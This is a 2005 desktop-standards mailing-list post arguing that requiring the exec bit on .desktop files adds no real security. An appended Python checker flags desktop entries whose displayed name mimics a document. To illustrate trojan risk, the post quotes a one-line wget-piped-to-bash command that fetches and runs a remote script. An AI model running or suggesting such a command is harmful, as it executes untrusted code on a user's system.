"Name" key value in desk. entry spec collides with file names, could misguide users?

Mike Hearn mike at navi.cx
Sun Mar 20 19:04:01 EET 2005


Requiring the +x bit on .desktop files changes their semantics and would
break existing software. For such an insignificant change it's not worth
it.

There's nothing magical or far-out about SELinux. It exists and is being
integrated into distributions. It's the right way to solve the problem.
No, it is not widely deployed today but then this is not a widespread
problem today on Linux either (in fact, I never heard of it happening),
so it seems better to solve it correctly so if/when this does become an
issue we haven't simply patched one trivial flaw and ignored the rest
but rather got a solid system in place.

> People who want to shoot themselves in the foot will be able to do it anyway by
> setting +x, sure, but the problem here is that people download a .desktop file
> by mail, they will look at its nice icon and the faked name will convince them to
> double click it.

So what? You can run arbitrary code as root on some distros by attaching
an RPM called "Cool Screensaver" to an email. It doesn't have to have
a .rpm extension to be recognised as a package, and the "box" icon is so
generic nobody is likely to see it and think "hmm maybe I shouldn't
click".

There is a solution to this problem but it doesn't involve piling hacks
upon other hacks and breaking existing software whilst doing it.

> For normal people, setting +x is a _difficult_ task

It is not, you just have to check the right boxes in the properties
window. Anybody can learn that. I don't agree that this would have any
benefit at all, not even psychological - fundamentally writing trojan
horses is not difficult and if you can convince somebody to click on an
icon you can convince them to copy/paste some meaningless command into
the "Run" dialog like:

  wget http://foo.org/bar.sh -q -O /dev/stdout | bash -

which achieves the same effect.

> Note that requiring the +x bit is something that should have happened _anyway_
> regardless of security and everything. We don't execute .pl files with perl just because
> their extension is .pl. 

But of course anybody can, just by writing "perl foo.pl". The +x bit
offers no security, worse it offers only the illusion of security. I
would like to see Mozilla automatically set the +x bit on executable
files like shell scripts, in fact I filed a bug for that in bugzilla.
Why? Because I don't believe requiring a magic flag to be set to run a
program makes things more secure, it just decreases usability. 

> Anyway, requiring the +x bit WILL improve security at the end of the day.

Asserting this doesn't make it true. I don't see any evidence that it
increases security, just vague ideas about what people might or might
not do in hypothetical situations. 

If somebody wants the computer to do something, eventually they will
figure out how especially if we provide a nice GUI for it as all
desktops do. If that wasn't true then there'd be no point in trying to
make discoverable UI, but there is a wealth of usability studies that
show how people can make a computer do what they want by exploring the
user interface and discovering new features.

In short, I think requiring +x on .desktop files:

a) Does not increase security
b) Breaks existing software and specifications (this is BAD!)
c) Gives people an impression of security which does not exist, so
   reducing incentives to work on real solutions

thanks -mike
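The thread turns on two facts that are independent of each other: the "Name" key is what a file manager displays, while the +x bit is a property of the file on disk. The following checker, added here as an example and not part of Mike's post or the xdg spec, parses a desktop entry and reports both, so a triage script can flag an entry whose displayed Name mimics a document while its Exec line runs a command. The sample entry, the document-extension list and the helper names are constructed for the illustration.

```python
"""Inspect a .desktop file: displayed Name vs. on-disk exec bit (added example)."""
import os
import stat
import tempfile
from configparser import ConfigParser

# Constructed sample entry: the displayed Name looks like a PDF, but the
# entry is an Application whose Exec line runs a shell command.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=quarterly_report.pdf
Icon=application-pdf
Exec=sh -c 'echo hello'
"""

# Constructed list of extensions a user would read as "a document, not a program".
DOC_EXTENSIONS = (".pdf", ".doc", ".odt", ".txt", ".jpg", ".png", ".zip")


def parse_desktop_entry(text):
    """Return the [Desktop Entry] group as a dict (keys are case-sensitive)."""
    cp = ConfigParser(interpolation=None)  # Exec lines may contain '%' field codes
    cp.optionxform = str
    cp.read_string(text)
    if "Desktop Entry" not in cp:
        raise ValueError("no [Desktop Entry] group")
    return dict(cp["Desktop Entry"])


def name_looks_like_document(name):
    """True if the displayed Name ends in a document-style extension."""
    return name.lower().endswith(DOC_EXTENSIONS)


def inspect_desktop_file(path):
    """Report what the user sees (Name) next to what the system knows (mode, Exec)."""
    with open(path, encoding="utf-8") as f:
        entry = parse_desktop_entry(f.read())
    mode = os.stat(path).st_mode
    has_exec_bit = bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
    name = entry.get("Name", "")
    return {
        "file_name": os.path.basename(path),
        "displayed_name": name,
        "exec": entry.get("Exec"),
        "has_exec_bit": has_exec_bit,
        # The mismatch a reviewer cares about: document-like label on an Application.
        "name_mimics_document": (
            entry.get("Type") == "Application" and name_looks_like_document(name)
        ),
    }


def demo():
    """Write the sample entry, inspect it, set +x, inspect again."""
    workdir = tempfile.mkdtemp()
    path = os.path.join(workdir, "readme.desktop")
    with open(path, "w", encoding="utf-8") as f:
        f.write(SAMPLE_DESKTOP)
    before = inspect_desktop_file(path)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)
    after = inspect_desktop_file(path)
    return before, after


if __name__ == "__main__":
    for label, report in zip(("without +x", "with +x"), demo()):
        print(label, report)
```

Running `demo()` shows that toggling the exec bit changes only `has_exec_bit`; `displayed_name`, `exec` and the `name_mimics_document` flag are identical in both reports, which is the point of the post: a policy keyed on +x says nothing about what the user is shown.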